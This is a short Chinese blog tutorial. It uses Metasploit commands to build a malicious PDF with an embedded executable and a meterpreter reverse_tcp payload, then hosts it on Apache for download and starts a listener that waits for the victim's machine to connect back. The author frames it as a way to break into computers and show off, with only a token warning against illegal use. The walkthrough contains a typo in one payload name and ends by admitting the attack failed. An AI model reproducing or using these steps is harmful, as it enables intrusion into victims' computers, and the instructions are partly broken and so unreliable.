提示:我们8月28号开学,所以我得快点更新了,不能拖了

文章目录

  • 前言
  • 一、打开终端
  • 总结

前言

PDF文件被广泛应用于共享信息,电子邮件,网站或文档或存储系统的真实链接
它可以用于恶意软件的载体。
不要问我什么意思?我的意思是PDF文件可以入侵你的电脑,是的,这很简单
学会这个您可以向您的家人,朋友,炫耀 (我是大黑阔,我好厉害呀)
当然,前提是不要用于违法活动,如果您进行了,您会在几分钟之内,进监狱,然后看不了我的文章了不能向家人炫耀了。
我不唠叨了,让我们开始吧
(这前言写的真好)


提示:以下是本篇文章非正文内容,下面案例请勿进行违法活动

一、打开终端


输入

msfconsole

然后输入这个:

use exploit/windows/fileformat/adobe_pdf_embedded_exe


我们得配置,输入

show options

输入:

set payload windows/x64/meterpreter/erverse_tcp


这将是他们所使用的ip
输入

show options


这是恶意PDF文件名,看完了吗?看完了我们继续
输入:

exploit

文件创建在哪里了?看这里。

是不是很麻烦,又要开权限,拿文件我们使用mv,输入

mv /root/.msf4/local/evil.pdf /var/www/html/evil.pdf

然后让我们打开apache服务,输入:

systemctl start apache2.service

让我再炫耀一次,输入这个

systemctl status apache2.service


这个是用来检查apache服务状态,然后就没了,这基本上是开了网络服务器。

这是Windows11,作为目标,当然,这是我的电脑,我很想用同学的电脑,当目标,他们害怕我,所以就用我的

打开浏览器输入您的IP/文件名
您会发现,啊,直接打开了,对的,您需要邮件,然后保存到桌面就行了
回到攻击机,输入:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp

坚持住,我们还差一个

set LHOST 192.168.0.140

然后输入

exploit

好吧,又出事故了,我打开文件了,却连接不了

我检查了很多遍,这跟我笔记上写的对啊?


总结

翻车了